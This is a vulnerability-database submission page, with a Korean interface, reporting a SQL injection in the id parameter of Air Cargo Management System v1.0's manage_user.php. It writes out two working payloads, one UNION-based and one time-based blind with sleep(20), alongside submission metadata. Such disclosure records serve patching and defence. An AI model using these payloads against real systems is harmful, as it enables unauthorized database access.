제출 #107271: Air Cargo Management System v1.0 /acms/admin/user/manage_user.php GET parameter id exists SQL injection vulnerability정보

제목Air Cargo Management System v1.0 /acms/admin/user/manage_user.php GET parameter id exists SQL injection vulnerability
설명An issue was discovered in Air Cargo Management System v1.0. There is a SQL injection that can directly issue instructions to the background database system via /acms/admin/user/manage_user.php?id. Payload1:id=-1' union all select null,null,null,concat(0x32333435,0x52535455,0x62636465),null,null,null,null,null,null-- - Payload2:id=1' and (select 1 from (select(sleep(20)))a) and 'c'='c
원천⚠️ https://github.com/west9b/bug_report/blob/main/SQLi-1.md
사용자
 lizhe (UID 43994)
제출2023. 03. 29. AM 11:27 (3 연령 ago)
모더레이션2023. 03. 30. PM 08:56 (1 day later)
상태수락
VulDB 항목224628 [SourceCodester Air Cargo Management System 1.0 GET Parameter manage_user.php 아이디 SQL 주입]
포인트들20

이전개요다음

Do you need the next level of professionalism?

Upgrade your account now!